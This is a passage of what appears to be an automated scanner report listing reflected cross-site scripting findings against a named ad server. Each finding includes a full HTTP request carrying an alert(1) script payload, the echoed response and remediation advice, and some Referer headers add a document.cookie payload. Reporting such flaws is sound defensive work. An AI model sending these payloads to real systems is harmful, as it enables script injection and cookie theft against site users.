GET /addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=86ba5'-alert(1)-'dc232125ca4 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 300

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028878|0|154|AdId=5633454;BnId=1;itime=507903153;" target=86ba5'-alert(1)-'dc232125ca4><img src="http://aka-cdn-ns.adtech.de/images/430/
...[SNIP]...

2.11. http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8360e'-alert(1)-'29e96183ae2 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=8360e'-alert(1)-'29e96183ae2 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144686%7C0%7C2130%7CADTECH;target=_blank;grp=9112943
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 304

document.write('<a href="http://adserver.adtech.de/?adlink|277|2144686|0|2130|AdId=2566839;BnId=53;itime=507918919;" target=8360e'-alert(1)-'29e96183ae2><img src="http://aka-cdn-ns.adtech.de/images/18
...[SNIP]...

2.12. http://adserver.adtech.de/addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 862c0'-alert(1)-'79cfb584069 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=862c0'-alert(1)-'79cfb584069 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://adserver.adtech.de/adiframe%7C3.0%7C277%7C2144687%7C0%7C2130%7CADTECH;target=_blank;grp=9112943
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 301

document.write('<a href="http://adserver.adtech.de/?adlink|277|2144687|0|2130|AdId=2586667;BnId=4;itime=507916691;" target=862c0'-alert(1)-'79cfb584069><img src="http://aka-cdn-ns.adtech.de/images/43/
...[SNIP]...

2.13. http://adserver.adtech.de/addyn|2.0|277|75593|1|246|target=_blank [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|2.0|277|75593|1|246|target=_blank

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77cfd'-alert(1)-'c95538b025c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|2.0|277|75593|1|246|target=_blank?77cfd'-alert(1)-'c95538b025c=1 HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 276

document.write('<a href="http://adserver.adtech.de/?adlink|277|75593|1|246|AdId=-3;BnId=0;itime=507995953;" target=_blank?77cfd'-alert(1)-'c95538b025c=1><img src="http://aka-cdn-ns.adtech.de/images/AT
...[SNIP]...

2.14. http://adserver.adtech.de/addyn|3.0|277|1028361|0|171|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|1028361|0|171|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e41'-alert(1)-'fbe60fa0e4a was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|1028361|0|171|ADTECH;target=13e41'-alert(1)-'fbe60fa0e4a HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 300

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028361|0|171|AdId=5855411;BnId=1;itime=507947702;" target=13e41'-alert(1)-'fbe60fa0e4a><img src="http://aka-cdn-ns.adtech.de/images/179/
...[SNIP]...

2.15. http://adserver.adtech.de/addyn|3.0|277|1028844|0|889|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|1028844|0|889|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ae0e'-alert(1)-'ad1f7721bb8 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|1028844|0|889|ADTECH;target=3ae0e'-alert(1)-'ad1f7721bb8 HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 578

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028844|0|889|AdId=2172450;BnId=2;itime=507964729;" target=3ae0e'-alert(1)-'ad1f7721bb8><img src="http://delivery-media.surftown.com/avw.
...[SNIP]...

2.16. http://adserver.adtech.de/addyn|3.0|277|1028878|0|154|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|1028878|0|154|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19364'-alert(1)-'41de7d250a3 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|1028878|0|154|ADTECH;target=19364'-alert(1)-'41de7d250a3 HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 300

document.write('<a href="http://adserver.adtech.de/?adlink|277|1028878|0|154|AdId=5633454;BnId=1;itime=507987332;" target=19364'-alert(1)-'41de7d250a3><img src="http://aka-cdn-ns.adtech.de/images/430/
...[SNIP]...

2.17. http://adserver.adtech.de/addyn|3.0|277|2144686|0|2130|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|2144686|0|2130|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15140'-alert(1)-'943d8807d0d was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|2144686|0|2130|ADTECH;target=15140'-alert(1)-'943d8807d0d HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 304

document.write('<a href="http://adserver.adtech.de/?adlink|277|2144686|0|2130|AdId=2566839;BnId=52;itime=508013900;" target=15140'-alert(1)-'943d8807d0d><img src="http://aka-cdn-ns.adtech.de/images/18
...[SNIP]...

2.18. http://adserver.adtech.de/addyn|3.0|277|2144687|0|2130|ADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn|3.0|277|2144687|0|2130|ADTECH

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8e01'-alert(1)-'dd5813d7c1f was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn|3.0|277|2144687|0|2130|ADTECH;target=e8e01'-alert(1)-'dd5813d7c1f HTTP/1.1
Host: adserver.adtech.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4D0A0D7F6E651A44E171CE41F0002F7C; CfP=1;

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 301

document.write('<a href="http://adserver.adtech.de/?adlink|277|2144687|0|2130|AdId=2586667;BnId=4;itime=508002333;" target=e8e01'-alert(1)-'dd5813d7c1f><img src="http://aka-cdn-ns.adtech.de/images/43/
...[SNIP]...

2.19. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c5f3"><script>alert(1)</script>31251b41629 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH5c5f3"><script>alert(1)</script>31251b41629;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH5c5f3"><script>alert(1)</script>31251b41629;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.20. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbfe9"><script>alert(1)</script>7414326b96b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943&fbfe9"><script>alert(1)</script>7414326b96b=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943&fbfe9"><script>alert(1)</script>7414326b96b=1;adiframe=y">
...[SNIP]...

2.21. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e61e7"><script>alert(1)</script>9b5044c0fa6 was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943e61e7"><script>alert(1)</script>9b5044c0fa6 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=_blank;grp=9112943e61e7"><script>alert(1)</script>9b5044c0fa6;adiframe=y">
...[SNIP]...

2.22. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e5f71><script>alert(1)</script>8b855ad043f was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;target=e5f71><script>alert(1)</script>8b855ad043f HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 284

<html><body><base target=e5f71><script>alert(1)</script>8b855ad043f><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028361%7C0%7C171%7CADTECH;t
...[SNIP]...

2.23. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cfc0"><script>alert(1)</script>08069858cfb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH4cfc0"><script>alert(1)</script>08069858cfb;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH4cfc0"><script>alert(1)</script>08069858cfb;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.24. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad316"><script>alert(1)</script>c5ed9f78d89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943&ad316"><script>alert(1)</script>c5ed9f78d89=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 270

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943&ad316"><script>alert(1)</script>c5ed9f78d89=1;adiframe=y">
...[SNIP]...

2.25. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa629"><script>alert(1)</script>ae7026f283f was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943fa629"><script>alert(1)</script>ae7026f283f HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=_blank;grp=9112943fa629"><script>alert(1)</script>ae7026f283f;adiframe=y">
...[SNIP]...

2.26. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH

Issue detail

The value of the target request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7b45d><script>alert(1)</script>7f8724349bc was submitted in the target parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;target=7b45d><script>alert(1)</script>7f8724349bc HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 284

<html><body><base target=7b45d><script>alert(1)</script>7f8724349bc><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028844%7C0%7C889%7CADTECH;t
...[SNIP]...

2.27. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5927c"><script>alert(1)</script>441730d7db1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH5927c"><script>alert(1)</script>441730d7db1;target=_blank;grp=9112943 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.computerworld.dk/art/112943db257%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3f8a39181ee
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CfP=1; JEB2=4D0A0D7F6E651A44E171CE41F0002F7C

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 267

<html><body><base target=_blank><script language="JavaScript" type="text/javascript" src="http://adserver.adtech.de/addyn%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH5927c"><script>alert(1)</script>441730d7db1;target=_blank;grp=9112943;adiframe=y">
...[SNIP]...

2.28. http://adserver.adtech.de/adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef357"><script>alert(1)</script>0faf3202082 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe%7C3.0%7C277%7C1028878%7C0%7C154%7CADTECH;target=_blank;grp=9112943&ef357"><script>alert(1)</script>0faf3202082=1 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
